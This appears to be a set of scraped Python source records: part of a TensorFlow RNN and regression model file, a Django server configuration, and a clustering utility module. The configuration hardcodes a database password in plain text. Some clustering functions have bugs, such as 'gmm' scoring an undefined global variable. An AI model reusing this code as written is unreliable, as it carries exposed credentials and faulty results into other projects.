subgraph.\n\n Args:\n x: tensor or placeholder for input features,\n shape should be [batch_size, n_features].\n y: tensor or placeholder for labels (one-hot),\n shape should be [batch_size, n_classes].\n class_weight: tensor, [n_classes], where for each class\n it has weight of the class. If not provided\n will check if graph contains tensor `class_weight:0`.\n If that is not provided either all ones are used.\n init_mean: the mean value to use for initialization.\n init_stddev: the standard devation to use for initialization.\n\n Returns:\n Predictions and loss tensors.\n\n Side effects:\n The variables linear_regression.weights and linear_regression.bias are\n initialized as follows. If init_mean is not None, then initialization\n will be done using a random normal initializer with the given init_mean\n and init_stddv. (These may be set to 0.0 each if a zero initialization\n is desirable for convex use cases.) 
If init_mean is None, then the\n uniform_unit_scaling_initialzer will be used.\n \"\"\"\n with vs.variable_scope('logistic_regression'):\n scope_name = vs.get_variable_scope().name\n summary.histogram('%s.x' % scope_name, x)\n summary.histogram('%s.y' % scope_name, y)\n dtype = x.dtype.base_dtype\n # Set up the requested initialization.\n if init_mean is None:\n weights = vs.get_variable(\n 'weights', [x.get_shape()[1], y.get_shape()[-1]], dtype=dtype)\n bias = vs.get_variable('bias', [y.get_shape()[-1]], dtype=dtype)\n else:\n weights = vs.get_variable(\n 'weights', [x.get_shape()[1], y.get_shape()[-1]],\n initializer=init_ops.random_normal_initializer(\n init_mean, init_stddev, dtype=dtype),\n dtype=dtype)\n bias = vs.get_variable(\n 'bias', [y.get_shape()[-1]],\n initializer=init_ops.random_normal_initializer(\n init_mean, init_stddev, dtype=dtype),\n dtype=dtype)\n summary.histogram('%s.weights' % scope_name, weights)\n summary.histogram('%s.bias' % scope_name, bias)\n # If no class weight provided, try to retrieve one from pre-defined\n # tensor name in the graph.\n if not class_weight:\n try:\n class_weight = ops.get_default_graph().get_tensor_by_name(\n 'class_weight:0')\n except KeyError:\n pass\n\n return losses_ops.softmax_classifier(\n x, y, weights, bias, class_weight=class_weight)\n\n\n## This will be in TensorFlow 0.7.\n## TODO(ilblackdragon): Clean this up when it's released\ndef _reverse_seq(input_seq, lengths):\n \"\"\"Reverse a list of Tensors up to specified lengths.\n\n Args:\n input_seq: Sequence of seq_len tensors of dimension (batch_size, depth)\n lengths: A tensor of dimension batch_size, containing lengths for each\n sequence in the batch. If \"None\" is specified, simply\n reverses the list.\n\n Returns:\n time-reversed sequence\n \"\"\"\n if lengths is None:\n return list(reversed(input_seq))\n\n for input_ in input_seq:\n input_.set_shape(input_.get_shape().with_rank(2))\n\n # Join into (time, batch_size, depth)\n s_joined = array_ops_.pack(input_seq)\n\n # Reverse along dimension 0\n s_reversed = array_ops_.reverse_sequence(s_joined, lengths, 0, 1)\n # Split again into list\n result = array_ops_.unpack(s_reversed)\n return result\n\n\ndef bidirectional_rnn(cell_fw,\n cell_bw,\n inputs,\n initial_state_fw=None,\n initial_state_bw=None,\n dtype=None,\n sequence_length=None,\n scope=None):\n \"\"\"Creates a bidirectional recurrent neural network.\n\n Similar to the unidirectional case (rnn) but takes input and builds\n independent forward and backward RNNs with the final forward and backward\n outputs depth-concatenated, such that the output will have the format\n [time][batch][cell_fw.output_size + cell_bw.output_size]. The input_size of\n forward and backward cell must match. The initial state for both directions\n is zero by default (but can be set optionally) and no intermediate states\n are ever returned -- the network is fully unrolled for the given (passed in)\n length(s) of the sequence(s) or completely unrolled if length(s) is not\n given.\n Args:\n cell_fw: An instance of RNNCell, to be used for forward direction.\n cell_bw: An instance of RNNCell, to be used for backward direction.\n inputs: A length T list of inputs, each a tensor of shape\n [batch_size, cell.input_size].\n initial_state_fw: (optional) An initial state for the forward RNN.\n This must be a tensor of appropriate type and shape\n [batch_size x cell.state_size].\n initial_state_bw: (optional) Same as for initial_state_fw.\n dtype: (optional) The data type for the initial state. 
Required if\n either of the initial states are not provided.\n sequence_length: (optional) An int64 vector (tensor) of size\n [batch_size],\n containing the actual lengths for each of the sequences.\n scope: VariableScope for the created subgraph; defaults to \"BiRNN\"\n\n Returns:\n A pair (outputs, state) where:\n outputs is a length T list of outputs (one for each input), which\n are depth-concatenated forward and backward outputs\n state is the concatenated final state of the forward and backward RNN\n\n Raises:\n TypeError: If \"cell_fw\" or \"cell_bw\" is not an instance of RNNCell.\n ValueError: If inputs is None or an empty list.\n \"\"\"\n\n if not isinstance(cell_fw, contrib_rnn.RNNCell):\n raise TypeError('cell_fw must be an instance of RNNCell')\n if not isinstance(cell_bw, contrib_rnn.RNNCell):\n raise TypeError('cell_bw must be an instance of RNNCell')\n if not isinstance(inputs, list):\n raise TypeError('inputs must be a list')\n if not inputs:\n raise ValueError('inputs must not be empty')\n\n name = scope or 'BiRNN'\n # Forward direction\n with vs.variable_scope(name + '_FW'):\n output_fw, state_fw = contrib_rnn.static_rnn(cell_fw, inputs,\n initial_state_fw, dtype,\n sequence_length)\n\n # Backward direction\n with vs.variable_scope(name + '_BW'):\n tmp, state_bw = contrib_rnn.static_rnn(\n cell_bw,\n _reverse_seq(inputs, sequence_length), initial_state_bw, dtype,\n sequence_length)\n output_bw = _reverse_seq(tmp, sequence_length)\n # Concat each of the forward/backward outputs\n outputs = [\n array_ops_.concat([fw, bw], 1) for fw, bw in zip(output_fw, output_bw)\n ]\n\n return outputs, array_ops_.concat([state_fw, state_bw], 1)\n\n\n# End of TensorFlow 0.7\n\n\ndef get_rnn_model(rnn_size, cell_type, num_layers, input_op_fn, bidirectional,\n target_predictor_fn, sequence_length, initial_state,\n attn_length, attn_size, attn_vec_size):\n \"\"\"Returns a function that creates a RNN TensorFlow subgraph.\n\n Args:\n rnn_size: The size for rnn cell, e.g. size of your word embeddings.\n cell_type: The type of rnn cell, including rnn, gru, and lstm.\n num_layers: The number of layers of the rnn model.\n input_op_fn: Function that will transform the input tensor, such as\n creating word embeddings, byte list, etc. This takes\n an argument `x` for input and returns transformed `x`.\n bidirectional: boolean, Whether this is a bidirectional rnn.\n target_predictor_fn: Function that will predict target from input\n features. This can be logistic regression,\n linear regression or any other model,\n that takes `x`, `y` and returns predictions and loss\n tensors.\n sequence_length: If sequence_length is provided, dynamic calculation is\n performed. This saves computational time when unrolling past max sequence\n length. Required for bidirectional RNNs.\n initial_state: An initial state for the RNN. 
This must be a tensor of\n appropriate type and shape [batch_size x cell.state_size].\n attn_length: integer, the size of attention vector attached to rnn cells.\n attn_size: integer, the size of an attention window attached to rnn cells.\n attn_vec_size: integer, the number of convolutional features calculated on\n attention state and the size of the hidden layer built from base cell\n state.\n\n Returns:\n A function that creates the subgraph.\n \"\"\"\n\n def rnn_estimator(x, y):\n \"\"\"RNN estimator with target predictor function on top.\"\"\"\n x = input_op_fn(x)\n if cell_type == 'rnn':\n cell_fn = contrib_rnn.BasicRNNCell\n elif cell_type == 'gru':\n cell_fn = contrib_rnn.GRUCell\n elif cell_type == 'lstm':\n cell_fn = functools.partial(\n contrib_rnn.BasicLSTMCell, state_is_tuple=False)\n else:\n raise ValueError('cell_type {} is not supported. '.format(cell_type))\n # TODO(ipolosukhin): state_is_tuple=False is deprecated\n if bidirectional:\n # forward direction cell\n fw_cell = lambda: cell_fn(rnn_size)\n bw_cell = lambda: cell_fn(rnn_size)\n # attach attention cells if specified\n if attn_length is not None:\n def attn_fw_cell():\n return contrib_rnn.AttentionCellWrapper(\n fw_cell(),\n attn_length=attn_length,\n attn_size=attn_size,\n attn_vec_size=attn_vec_size,\n state_is_tuple=False)\n\n def attn_bw_cell():\n return contrib_rnn.AttentionCellWrapper(\n bw_cell(),\n attn_length=attn_length,\n attn_size=attn_size,\n attn_vec_size=attn_vec_size,\n state_is_tuple=False)\n else:\n attn_fw_cell = fw_cell\n attn_bw_cell = bw_cell\n\n rnn_fw_cell = contrib_rnn.MultiRNNCell(\n [attn_fw_cell() for _ in range(num_layers)], state_is_tuple=False)\n # backward direction cell\n rnn_bw_cell = contrib_rnn.MultiRNNCell(\n [attn_bw_cell() for _ in range(num_layers)], state_is_tuple=False)\n # pylint: disable=unexpected-keyword-arg, no-value-for-parameter\n _, encoding = bidirectional_rnn(\n rnn_fw_cell,\n rnn_bw_cell,\n x,\n dtype=dtypes.float32,\n sequence_length=sequence_length,\n initial_state_fw=initial_state,\n initial_state_bw=initial_state)\n else:\n rnn_cell = lambda: cell_fn(rnn_size)\n\n if attn_length is not None:\n def attn_rnn_cell():\n return contrib_rnn.AttentionCellWrapper(\n rnn_cell(),\n attn_length=attn_length,\n attn_size=attn_size,\n attn_vec_size=attn_vec_size,\n state_is_tuple=False)\n else:\n attn_rnn_cell = rnn_cell\n\n cell = contrib_rnn.MultiRNNCell(\n [attn_rnn_cell() for _ in range(num_layers)], state_is_tuple=False)\n _, encoding = contrib_rnn.static_rnn(\n cell,\n x,\n dtype=dtypes.float32,\n sequence_length=sequence_length,\n initial_state=initial_state)\n return target_predictor_fn(encoding, y)\n\n return rnn_estimator\n","sub_path":"Tensorflow_OpenCV_Nightly/source/tensorflow/contrib/learn/python/learn/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":15389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"109975139","text":"#coding=utf-8\r\nDjangoDatabaseSettings = {\r\n 'default': {\r\n 'ENGINE': 'django.db.backends.mysql', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.\r\n 'NAME': 'foxter', # Or path to database file if using sqlite3.\r\n 'USER': 'foxter', # Not used with sqlite3.\r\n 'PASSWORD': 'karamba', # Not used with sqlite3.\r\n 'HOST': '', # Set to empty string for localhost. Not used with sqlite3.\r\n 'PORT': '', # Set to empty string for default. 
Not used with sqlite3.\r\n 'OPTIONS':{ 'init_command': 'SET storage_engine=INNODB, SESSION TRANSACTION ISOLATION LEVEL READ COMMITTED'}\r\n }\r\n}\r\n\r\nRUNTYPE_PRODUCTION = False\r\nLOG_TO_FILES = True\r\n\r\n#Address and port for server control\r\nSERV_CONTROL_ADDR = ('127.0.0.1', 8888)\r\n\r\n#list of frontend processes \r\nFrontendList = [\r\n { 'Name':'FR1', 'WebPort': 8001 } , #WebPort - port for accepting Socket.IO connections\r\n { 'Name':'FR2', 'WebPort': 8002 } , #When using several frontends or a non-standard port \r\n# { 'Name':'FR3', 'WebPort': 8003 } , #a TCP proxy server such as haProxy must be started in front of the frontend \r\n# { 'Name':'FR4', 'WebPort': 8004 } , #a TCP proxy server such as haProxy must be started in front of the frontend\r\n# { 'Name':'FR5', 'WebPort': 8005 } , #a TCP proxy server such as haProxy must be started in front of the frontend\r\n# { 'Name':'FR6', 'WebPort': 8006 } , #a TCP proxy server such as haProxy must be started in front of the frontend\r\n# { 'Name':'FR7', 'WebPort': 8007 } , #WebPort - port for accepting Socket.IO connections\r\n# { 'Name':'FR8', 'WebPort': 8008 } , #When using several frontends or a non-standard port \r\n]\r\n\r\n#list of backend processes\r\n#ReqEndPoint - address of the ZeroMQ socket for receiving requests (PULL socket)\r\n#ReplyEndPoint - address of the ZeroMQ socket for sending replies (ROUTER socket)\r\nBackendList = [\r\n { 'Name':'BE1', 'ReqEndPoint': 'tcp://127.0.0.1:10601' ,'ReplyEndPoint':'tcp://127.0.0.1:10701'} ,\r\n { 'Name':'BE2', 'ReqEndPoint': 'tcp://127.0.0.1:10602' ,'ReplyEndPoint':'tcp://127.0.0.1:10702'} ,\r\n# { 'Name':'BE3', 'ReqEndPoint': 'tcp://127.0.0.1:10603' ,'ReplyEndPoint':'tcp://127.0.0.1:10703'} ,\r\n# { 'Name':'BE4', 'ReqEndPoint': 'tcp://127.0.0.1:10604' ,'ReplyEndPoint':'tcp://127.0.0.1:10704'} , \r\n# { 'Name':'BE5', 'ReqEndPoint': 'tcp://127.0.0.1:10605' ,'ReplyEndPoint':'tcp://127.0.0.1:10705'} , \r\n# { 'Name':'BE6', 'ReqEndPoint': 'tcp://127.0.0.1:10606' ,'ReplyEndPoint':'tcp://127.0.0.1:10706'} , \r\n #{ 'Name':'BE7', 'ReqEndPoint': 'tcp://127.0.0.1:10607' ,'ReplyEndPoint':'tcp://127.0.0.1:10707'} , \r\n #{ 'Name':'BE8', 'ReqEndPoint': 'tcp://127.0.0.1:10608' ,'ReplyEndPoint':'tcp://127.0.0.1:10708'} , \r\n]\r\n\r\n#memcached settings\r\nMemcachedSettings = {\r\n 'MultiServer': False,\r\n 'User': 'foxter', #user under which memcached will be run\r\n 'ExecPath': '/usr/bin/memcached',#'C:/temp/memcached.exe',# #path to the executable\r\n 'Servers': ['127.0.0.1:10801'] #list of servers to start \r\n}\r\n\r\n#Settings of the statistics collection service\r\nStatLogSettings = {\r\n 'Level': 'FULL',\r\n 'StatEndPoint': 'tcp://127.0.0.1:10901', #address of the ZeroMQ socket for receiving statistics messages\r\n}\r\n\r\n#settings of the background tasks process\r\nSyncServiceSettings = {\r\n 'SyncEndPoint':'tcp://127.0.0.1:11001', #ZeroMQ socket for messages from the process\r\n 'SyncReqPoint':'tcp://127.0.0.1:11002', #ZeroMQ socket for requests to the process\r\n 'SyncInterval': 100, #ms #interval of the periodic check\r\n}\r\n","sub_path":"config/globalsets.py","file_name":"globalsets.py","file_ext":"py","file_size_in_byte":4409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"507328762","text":"'''\n----------------------------------------------------------------------------------------------------\nThis is a general utility function to perform various tasks for unsupervised 
ML\n----------------------------------------------------------------------------------------------------\nBy Huanwang Henry Yang (2019-06-12)\n'''\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom sklearn import metrics\nfrom sklearn.cluster import KMeans, MeanShift, estimate_bandwidth\nfrom sklearn.cluster import AgglomerativeClustering\nfrom sklearn.datasets import load_digits, make_blobs\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import scale\nfrom sklearn.metrics import silhouette_samples, silhouette_score\nfrom kmodes.kprototypes import KPrototypes\nfrom kmodes.kmodes import KModes\nimport scipy.cluster.hierarchy as sch\nimport matplotlib.cm as cm\nfrom tqdm import tqdm #provide visual bar\n\n#------------------------------------------------------------------------ \n#------------------------------------------------------------------------ \n#------------------------------------------------------------------------ \ndef cluster_mean_table(df_in, col_all, cluster_name='cluster') :\n '''cluster_mean_table(df_in, col_all, cluster_name='cluster')\n Generate a table for the average of all the given attributes. \n df_in: a DF \n col_all : the given column names to get the averaged values.\n '''\n \n df=df_in.copy()\n \n col= col_all + [cluster_name]\n df1=df[col].groupby([cluster_name]).mean().T #DF for all attributes\n df2=df[col_all].mean().to_frame('overall_mean') #Df for the avg of attributes\n df_12=pd.concat([df1, df2], axis=1) #merge by column\n \n # add a row for cluster_counts\n df3=df[cluster_name].value_counts().to_frame('cluster_counts').T \n df_w=pd.concat([df3, df_12], axis=0)\n df_w.loc['cluster_counts', 'overall_mean'] = df3.mean(axis=1)['cluster_counts']\n \n #calculate the ratio between the overall_mean and each cluster\n coln=df_w.drop(['overall_mean'], axis=1).columns\n d1=df_w.drop(coln, axis=1)\n d2=df_w[coln].div(df_w.overall_mean, axis=0)\n df_ratio=pd.concat([d2, d1], axis=1 )\n\n return df_ratio #, df_3\n\n#------------------------------------------------------------------------ \ndef add_cluster_2df(df_file, df_fit, kmean, npca=0):\n '''add_cluster_2df(df_file, kmean)\n df_file: a DF to which the clusters are put for details analysis. \n df_fit: is the DF for fitting KMeans. (only used here to print the score).\n kmean: is the KMeans model after fitting\n npca: add the number of component (npca) to the df_file for display (e.g. 
by Tableau)\n '''\n\n #IF PCA, create a DF for the PCA transformed data (add it to df_file for display only)\n if (npca>=2) : \n col_pca=['pca_comp_'+str(i+1) for i in range(npca) ]\n df_pca=pd.DataFrame(data=df_fit[:,0:npca], columns=col_pca)\n #print(df_pca.shape)\n \n y_km = kmean.labels_ #same as #y_km = km.fit_predict(df3)\n df_f=df_file.copy().reset_index(drop=True) # \n\n df_f['cluster'] = y_km +1 #put the predicted cluster into the DF\n\n if (npca>=2) : \n df_f=pd.concat([df_f, df_pca], axis=1)\n\n# reorder the clusters from large to small\n arg=list(df_f.cluster.value_counts().index) #original value\n rep=list(df_f.cluster.value_counts().sort_index().index) #reordered value\n repl=['cluster_' + str(i) for i in rep] #convert to string\n df_f.cluster.replace(arg, repl, inplace=True)\n\n# print('center of the cluster=\\n', km.cluster_centers_)\n print('Kmeans score= {:.2f}' .format(kmean.score(df_fit)))\n print('Cluster and observation\\n', df_f.cluster.value_counts().sort_index())\n \n return df_f\n\n\n#------------------------------------------------------------------------ \n\ndef cluster_var_selection(df_in, col=[], maxeigval=0.8):\n '''Select variables from each cluster based on PCA, eigenvalues, and the R_Sq ratio\n RS_ratio= 1- RS_Own_cluster / RS_Next_closest_Cluster\n Select the one variable from each cluster that has the minimum RS_ratio.\n \n maxeigval: given 0.8\n maxeigval = 0.8. It means that clusters will split if the second eigenvalue \n is greater than 0.8. A larger value of this parameter gives fewer clusters \n and less of the variation explained. A smaller value gives more clusters and \n more variation explained. The common choice is 1 as it represents the average \n size of eigenvalues.\n '''\n from varclushi import VarClusHi\n\n df=df_in.select_dtypes(include='number') #must be num\n if len(col)>0: \n df=df_in[col]\n \n vmod=VarClusHi(df, maxeigval2=maxeigval, maxclus=None)\n vmod.varclus()\n dd=vmod.rsquare \n return dd\n\n#------------------------------------------------------------------------ \ndef kmean_test_init(X, n_clusters=3):\n '''KMeans depends on the initial allocation of the centroids.\n Test 5 different allocations of the centroids, and pick the better score\n '''\n import random\n n_iter = 5\n score=[]\n for i in range(n_iter):\n # Run local implementation of kmeans\n random_num=random.randint(0, 1000)\n km = KMeans(n_clusters=n_clusters,random_state=random_num)\n \n km.fit(X)\n val=km.score(X)\n score.append(val)\n print(\"random_state=\", random_num, \"score=\", val)\n return score\n\n#------------------------------------------------------------------------ \ndef silhouette(X, n_clust):\n '''A function to determine the degree of separation between clusters.\n X: a np.array; n_clust: number of the given maximum clusters.\n \n1. Compute the average distance from all data points in the same cluster (ai).\n2. Compute the average distance from all data points in the closest cluster (bi).\n3. Compute the coefficient: (bi - ai)/max(ai,bi). Values in the interval [-1, 1]\n\nIf it is 0 –> the sample is very close to the neighboring clusters.\nIf it is 1 –> the sample is far away from the neighboring clusters (correct cluster).\nIf it is -1 –> the sample is assigned to the wrong clusters. \n\n--------------\nYellowbrick in sklearn gives a visual check.\n\nThe vertical red line is the average of the score. \nFor good clustering, it should satisfy the following conditions:\n1. The motif (brick) should be above (pass) the average line. \n2. 
The tail on the left of each motif shows the overlap level with other motifs. \n The samller the tail is, the less overlap of the neighboring cluster.\n3. Ideally, the size of each motif is similar.\n\n '''\n\n X=np.array(X)\n sscore=[]\n for n_clusters in range(2, n_clust):\n # Create a subplot with 1 row and 2 columns\n fig, (ax1, ax2) = plt.subplots(1, 2)\n fig.set_size_inches(12, 5)\n\n # The 1st subplot is the silhouette plot\n # The silhouette coefficient can range from -1, 1 but in this example all\n # lie within [-0.1, 1]\n ax1.set_xlim([-1, 1])\n \n # The (n_clusters+1)*10 is for inserting blank space between silhouette\n # plots of individual clusters, to demarcate them clearly.\n ax1.set_ylim([0, len(X) + (n_clusters + 1) * 10])\n\n # Initialize the clusterer with n_clusters value and a random generator\n # seed of 10 for reproducibility.\n clusterer = KMeans(n_clusters=n_clusters, random_state=10)\n cluster_labels = clusterer.fit_predict(X)\n\n # The silhouette_score gives the average value for all the samples.\n # This gives a perspective into the density and separation of the formed\n # clusters\n silhouette_avg = silhouette_score(X, cluster_labels)\n sscore.append(silhouette_avg)\n print(\"For n_clusters =\", n_clusters,\n \"The average silhouette_score is :\", silhouette_avg)\n\n # Compute the silhouette scores for each sample\n sample_silhouette_values = silhouette_samples(X, cluster_labels)\n\n y_lower = 10\n for i in range(n_clusters):\n # Aggregate the silhouette scores for samples belonging to\n # cluster i, and sort them\n ith_cluster_silhouette_values = \\\n sample_silhouette_values[cluster_labels == i]\n\n ith_cluster_silhouette_values.sort()\n\n size_cluster_i = ith_cluster_silhouette_values.shape[0]\n y_upper = y_lower + size_cluster_i\n\n color = cm.nipy_spectral(float(i) / n_clusters)\n ax1.fill_betweenx(np.arange(y_lower, y_upper),\n 0, ith_cluster_silhouette_values,\n facecolor=color, edgecolor=color, alpha=0.7)\n\n # Label the silhouette plots with their cluster numbers at the middle\n ax1.text(-0.05, y_lower + 0.5 * size_cluster_i, str(i+1))\n\n # Compute the new y_lower for next plot\n y_lower = y_upper + 10 # 10 for the 0 samples\n\n ax1.set_title(\"The silhouette plot for the various clusters.\")\n ax1.set_xlabel(\"The silhouette coefficient values\")\n ax1.set_ylabel(\"Cluster label\")\n\n # The vertical line for average silhouette score of all the values\n ax1.axvline(x=silhouette_avg, color=\"red\", linestyle=\"--\")\n\n ax1.set_yticks([]) # Clear the yaxis labels / ticks\n ax1.set_xticks([])\n # ax1.set_xticks([-0.1, 0, 0.2, 0.4, 0.6, 0.8, 1])\n\n # 2nd Plot showing the actual clusters formed\n colors = cm.nipy_spectral(cluster_labels.astype(float) / n_clusters)\n ax2.scatter(X[:, 0], X[:, 1], marker='.', s=30, lw=0, alpha=0.7, c=colors, edgecolor='k')\n\n # Labeling the clusters\n centers = clusterer.cluster_centers_\n # Draw white circles at cluster centers\n ax2.scatter(centers[:, 0], centers[:, 1], marker='o',\n c=\"white\", alpha=1, s=200, edgecolor='k')\n\n for i, c in enumerate(centers):\n ax2.scatter(c[0], c[1], marker='$%d$' % (i+1), alpha=1,\n s=50, edgecolor='k')\n\n ax2.set_title(\"The visualization of the clustered data.\")\n ax2.set_xlabel(\"Feature space for the 1st feature\")\n ax2.set_ylabel(\"Feature space for the 2nd feature\")\n\n plt.suptitle((\"Silhouette analysis for KMeans clustering on sample data \"\n \"with n_clusters = %d\" % n_clusters),\n fontsize=14, fontweight='bold')\n\n plt.show()\n plt.plot(range(2, n_clust), 
sscore)\n plt.xlabel(r'Number of clusters ')\n plt.ylabel('average silhouette_score');\n \nplt.show()\n\n#----------------------------------------------------------------\ndef estimate_eps(X, hline=0.3, knn=10):\n '''estimate_eps(X, hline=0.3) : estimate eps for DBscan\n '''\n from sklearn.neighbors import NearestNeighbors\n \n neighbors = NearestNeighbors(n_neighbors=knn)\n neighbors_fit = neighbors.fit(X)\n distances, indices = neighbors_fit.kneighbors(X)\n\n distances = np.sort(distances, axis=0)\n distances = distances[:,1]\n plt.axhline(y=hline, color='r', linestyle='--')\n plt.plot(distances)\n \n#----------------------------------------------------------------\ndef dbscan(X, eps=0.5, min_samples=5):\n ''' dbscan(X, eps=0.3, smaples=10) :\n X: an array\n The main concept of DBSCAN algorithm is to locate regions of high density that are \n separated from one another by regions of low density.\n Density at a point P: Number of points within a circle of Radius Eps (ϵ) from point P.\n Dense Region: For each point in the cluster, the circle with radius ϵ contains at least \n minimum number of points (MinPts).\n '''\n from sklearn.cluster import DBSCAN\n \n db_cluster = DBSCAN(eps=eps, min_samples=min_samples, n_jobs=-1).fit(X)\n \n core_samples_mask = np.zeros_like(db_cluster.labels_, dtype=bool)\n core_samples_mask[db_cluster.core_sample_indices_] = True\n labels = db_cluster.labels_\n\n# Number of clusters in labels, ignoring noise if present.\n n_clusters_ = len(set(labels)) - (1 if -1 in labels else 0)\n n_noise_ = list(labels).count(-1)\n\n print('Estimated number of clusters: %d' % n_clusters_)\n print('Estimated number of noise points: %d' % n_noise_)\n\n print(pd.DataFrame({'cluster': db_cluster.labels_}).value_counts())\n \n return labels\n\n#----------------------------------------------------------------\n\n# Gap Statistic for K means\n#https://towardsdatascience.com/cheat-sheet-to-implementing-7-methods-for-selecting-optimal-number-of-clusters-in-python-898241e1d6ad\ndef gap_stat(data, nrefs=3, maxClusters=15):\n \"\"\"\n Calculates KMeans optimal K using Gap Statistic \n Params:\n data: ndarry of shape (n_samples, n_features)\n nrefs: number of sample reference datasets to create\n maxClusters: Maximum number of clusters to test for\n Returns: (gaps, optimalK)\n \"\"\"\n gaps = np.zeros((len(range(1, maxClusters)),))\n resultsdf = pd.DataFrame({'clusterCount':[], 'gap':[]})\n for gap_index, k in enumerate(range(1, maxClusters)):\n# Holder for reference dispersion results\n refDisps = np.zeros(nrefs)\n# For n references, generate random sample and perform kmeans getting resulting dispersion of each loop\n for i in range(nrefs):\n \n # Create new random reference set\n randomReference = np.random.random_sample(size=data.shape)\n \n # Fit to it\n km = KMeans(k)\n km.fit(randomReference)\n \n refDisp = km.inertia_\n refDisps[i] = refDisp\n# Fit cluster to original data and create dispersion\n km = KMeans(k)\n km.fit(data)\n \n origDisp = km.inertia_\n# Calculate gap statistic\n gap = np.log(np.mean(refDisps)) - np.log(origDisp)\n# Assign this loop's gap statistic to gaps\n gaps[gap_index] = gap\n \n resultsdf = resultsdf.append({'clusterCount':k, 'gap':gap}, ignore_index=True)\n \n plt.plot(resultsdf['clusterCount'], resultsdf['gap'], linestyle='--', marker='o', color='b');\n plt.xlabel('K');\n plt.ylabel('Gap Statistic');\n plt.title('Gap Statistic vs. 
K'); \n return (gaps.argmax() + 1, resultsdf)\n\n#score_g, ddf = gap_stat(df4_tran, nrefs=5, maxClusters=10)\n\n#------------------------------------------------------------------------\ndef elbow (X, clusters=10, figsize=(6,6)):\n ''' A function to visulize the change of WSS with number of clusters\n X: a np.array; clusters: the number of given clusters\n '''\n sse = []\n list_k = list(range(1, clusters))\n\n# Run the Kmeans algorithm and get the index of data points clusters\n for k in list_k:\n km = KMeans(n_clusters=k)\n km.fit(X)\n sse.append(km.inertia_)\n\n# Plot sse against k\n plt.figure(figsize=figsize)\n plt.plot(list_k, sse, '-o')\n plt.xlabel(r'Number of clusters ')\n plt.ylabel('Sum of squared distance (within)');\n plt.grid()\n \n#----------------------------------------------------------------\ndef kmeans_metrics(X, clusters=15, metric='elbow'):\n ''' kmeans_metrics(X, clusters, metric='elbow')\n X: a df or np; clusters: number of clusters \n \n metric='silhouette' or 'calinski_harabasz'\n 1. Elbow: The explained variation changes rapidly for a small number of clusters \n and then it slows down leading to an elbow formation in the curve.\n \n 2. Silhouette Coefficient:\n It tells us if individual points are correctly assigned to their clusters.\n If S(i) close to 0 means that the point is between two clusters\n If S(i) is closer to -1, then we would be better off assigning it to the other clusters\n If S(i) is close to 1, then the point belongs to the ‘correct’ cluster\n \n 3. Calinski-Harabasz Index\n The Calinski-Harabasz Index is based on the idea that clusters that are (1) \n themselves very compact and (2) well-spaced from each other are good clusters.\n ** Calinski Harabasz Index is maximized for optimized cluster.\n \n '''\n # Elbow Method for K means\n \n from yellowbrick.cluster import KElbowVisualizer\n model = KMeans()\n# k is range of number of clusters.\n if (metric=='elbow'):\n visualizer = KElbowVisualizer(model, k=(2,clusters), timings= True)\n else:\n visualizer = KElbowVisualizer(model, k=(2,clusters), metric=metric, timings= True)\n visualizer.fit(X) # Fit data to visualizer\n visualizer.show() # Finalize and render figure\n \n#kmeans_metrics(df4_tran, metric='elbow')\n#kmeans_metrics(df4_tran, clusters=20, metric='silhouette')\n#kmeans_metrics(df4_tran, clusters=20, metric='calinski_harabasz')\n\n#----------------------------------------------------------------\ndef Davies_Bouldin_index(X, center=20):\n ''' Davies_Bouldin_index(X, center=20)\n INPUT:\n X: np or df. \n center - the number of centers you want (the k value)\n OUTPUT:\n score - the Davies Bouldin score for the kmeans model fit to the data\n \n Like silhouette coefficient and Calinski-Harabasz index, the DB index captures \n both the separation and compactness of the clusters.This is due to the fact \n that the measure’s ‘max’ statement repeatedly selects the values where the average \n point is farthest away from its center, and where the centers are closest together. \n But unlike silhouette coefficient and Calinski-Harabasz index, as DB index falls, \n the clustering improves. \n \n look for the small index!!\n '''\n\n scores = [] #get the scores\n centers = list(range(2,center))\n for center in centers:\n scores.append(get_kmeans_score(X, center))\n \n plt.plot(centers, scores, linestyle='--', marker='o', color='b')\n plt.xlabel('K')\n plt.ylabel('Davies Bouldin score')\n plt.title('Davies Bouldin score vs. 
K')\n \n#------------------------------------------------------------------------ \n\ndef get_kmeans_score(X, center):\n \n from sklearn.metrics import davies_bouldin_score\n\n #instantiate kmeans\n kmeans = KMeans(n_clusters=center)\n# Then fit the model to your data using the fit method\n model = kmeans.fit_predict(X)\n \n # Calculate Davies Bouldin score\n score = davies_bouldin_score(X, model)\n \n return score\n\n#Davies_Bouldin_index(df4_tran, center=30)\n\n#----------------------------------------------------------------\ndef hierarchical(X, clusters=10, figsize=(10, 8), hline=38):\n ''' The Agglomerative Hierarchical Clustering\n X : an array; n_clust: the number of given clusters\n\n begin with every point in the dataset as a “cluster.” Then find the two closest\n points and combine them into a cluster. Then, find the next closest points, \n and those become a cluster. Repeat the process until we only have one big giant cluster.\n '''\n\n# create dendrogram (for plotint Hierarchical Clusters)\n dendrogram = sch.dendrogram(sch.linkage(X, method='ward'))\n# create clusters\n hc = AgglomerativeClustering(n_clusters=clusters, affinity = 'euclidean', linkage = 'ward')\n plt.axhline(y=36, color='r', linestyle='--')\n\n# save clusters for chart\n y_hc = hc.fit_predict(X)\n \n return y_hc\n\n#------------------------------------------------------------------------ \ndef gmm(X, clusters=20):\n '''\n BIC for GMM. pick the smallest one\n \n '''\n# \n from sklearn.mixture import GaussianMixture\n n_components = range(1, clusters)\n covariance_type = ['spherical', 'tied', 'diag', 'full']\n score=[]\n for cov in covariance_type:\n for n_comp in n_components:\n gmm=GaussianMixture(n_components=n_comp,covariance_type=cov)\n gmm.fit(X)\n score.append((cov,n_comp,gmm.bic(df4_tran)))\n \n return score\n#gmm(df4_tran, clusters=20)\n#----------------------------------------------------------------\ndef kprototypes_cost(df, categorical=[], nclusters=3):\n '''kprototypes_cost(df, categorical=[], nclusters=3) : Elbow plot with cost (very slow!)\n categorical: a list to hold the positions of the categorical variable in DF (e.g. 
